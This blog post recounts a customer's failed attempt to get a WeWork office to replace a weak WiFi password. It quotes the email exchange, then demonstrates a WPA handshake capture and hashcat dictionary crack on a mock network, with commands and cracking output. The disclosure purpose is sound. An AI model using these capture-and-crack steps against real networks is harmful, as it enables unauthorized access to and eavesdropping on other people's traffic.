On Monday we became a tenant at the shared office provider WeWork. According to their website, “WeWork is a global network of workspaces where companies and people grow together.” We needed something more flexible while our new corporate office is being constructed.
Backing up about a year, I was invited by another WeWork customer to give a briefing in one of their Manhattan offices. We started chatting in the conference room, and one of the folks I was briefing asked me if I wanted to hook up my presentation on the smart television. That’s when I noticed the instructions called for installing some proprietary software. “No thanks”, I said, describing how I’d own everyone’s proprietary briefings if I was sitting in an apartment across the street. The group I was briefing generously laughed and we all moved on.
I suppose we can argue over whether I’m just paranoid, having seen one too many recent movies. How bad can the cyber security at WeWork really be?
After my first week at WeWork, I have to say that from a computer security perspective, I’m appalled. I emailed them on the first day:
The password chosen for the WiFi is extremely weak and easy for hackers to break, allowing access to customer data and potential compromise.
Because the password used is so simple to brute force and guess, any person within range of the network can eavesdrop and inject packets onto the network. This makes it extremely easy to compromise users on the network.
As it stands today, I could be in the parking lot of Tysons Mall and eavesdrop and attack WeWork customers.
Don’t just take my word for it, here is a stack overflow article that discusses the importance of password length, complexity, etc.:
Please do us all a favor and secure the WiFi with a stronger password. It’s currently embarrassingly weak.
Thank you for information. The WeWork network is a shared network with shared Bandwidth. WeWork does offer options for member who would like security on the network as additional IT services.
Internet Services • Private Subnet/Private VLAN $95.00 Monthly • Public IP Address – 1 address $95.00 Monthly • Private Office Network – Wireless $195.00 Monthly • Setup/Change fee: for Private VLAN and Static IP $250.00 One-time
Setup Fee: $250- One Time
Best, Samuel Whitehead Technology Lead (MId-Atlantic)
Needless to say, I didn’t take pleasure in their response:
The risks for WeWork are reputational and of course that effects the bottom line. Since the duty of care is being intentionally breached in this case by WeWork, we have no recourse except to potentially make our complaint public.
Being that we have strong ties with the entire cyber security community, this could be a potential public relations disaster for WeWork. Please defend your customers with the most basic password security best practices or we will be forced to take action.
Thanks and Regards,
This is getting elevated, but going nowhere.
Thank you for your concern. Currently, WeWork provides internet access in its current state as defined in the member agreement and additional services are optional to all members depending on their specific needs and wants. As part of our continued improvements, WeWork is in the process of building a fully secure integration with the Member network using 802.1x and Members credentials. The timeline for this rollout is early next year.
If you would like to discuss this topic in more detail, we will be happy to setup a call with our IT leadership team.
Best, Peter Peter Hasslinger WeWork | Director of Technology North America East & Israel
Can you privide me with contact information for your IT leadership??
I and the Director of Building Technology, you can reach out to me directly at Chad@wework.com
Thanks for taking the time today. My concerns are in the thread below. I think WeWork Tysons is putting customer’s data at risk by using a weak password on WiFi.
Please let me know what you’ll do to fix it As Soon As Practical.
Thanks and Regards,
Thank you for your concern, as noted previously, WeWork is in the process of building a fully secure integration with the Member network using 802.1x and Members credentials. The timeline for this rollout is early next year.
Simply changing the password will impact the entire member community and will be just as vulnerable as it is now without account based authentication.
Please let me know if you would like to discuss further and I will be happy to schedule time to discuss live.
It’s great that you’re upgrading to 802.1x.
That aside, right now you are using REDACTED as the network password.
I can crack that password in about 5 minutes with standard bruteforce techniques. If I can do it, so can any hacker or other criminal.
Instead I’m suggesting a strong password of at least 16 characters. Doing so significantly increases the security of the network. I’d be happy to give your IT staff a webinar or call to explain why this is the case. NUMBER (#) character passwords and especially ones formed from simple words or phrases are simply not enough these days to defeat brute force attacks.
For levity, please see this XKCD where they discussed this exact issue:
They are uninterested in feedback / customer concerns.
Thanks Nathan, I appreciate the offer but we feel confident in our approach to the future of the password change.
If you would like to discuss further feel free to send me a calendar invite
They closed the ticket/request and I was left with no solution. So there are all kinds of mitigations you can do to protect yourself from insecure WiFi. We will do those regardless if they fix the issue. The techniques we will use are outside the scope of this blog post.
That being said, I wanted to actually prove how easy it is to crack WPA secured networks with weak passwords:
Note: Don’t crack a network you are not authorized to access. I setup a mock WeWork network, far away from WeWork offices and tested the password that they used. None of WeWork’s network data was collected.
Here’s the important link: https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
What you’ll need:
# airmon-ng start wlp2s0mon
(this sets card into monitor mode for you)
# airodump-ng wlp2s0mon
(capture bssid without colons into mac.txt)
# hcxdumptool -o output.pcapng -I wlp2s0mon --filterlist=mac.txt --filtermode=2 --enable-status=3
(I let this run for about 3 minutes and authenticated to the network once before ctrl-c)
# hcxpcaptool -o hashcat.hccapx output.pcapng
(this converts to the required format for hashcat)
# hashcat -m 2500 hashcat.hccapx rockyou.txt --force
(rockyou.txt is a downloaded wordlist; force is required because the laptop has no video card)
hashcat (v4.0.1) starting...
OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz, 2048/5789 MB allocatable, 4MCU
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Password length minimum: 8
Password length maximum: 63
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.
* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=2500 -D _unroll'
* Device #1: Kernel m02500.ba62f6d1.kernel not found in cache! Building may take a while...
* Device #1: Kernel amp_a0.d6b1d443.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: Downloads/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
- Device #1: autotuned kernel-accel to 128
- Device #1: autotuned kernel-loops to 128
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckp5e5faREDACTED4fed23a5c41d6597e:f8REDACTEDe8f1:dREDACTED68d:WeWork:REDACTED
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => q
Literally 1 second, with NO GPU acceleration on my tablet laptop.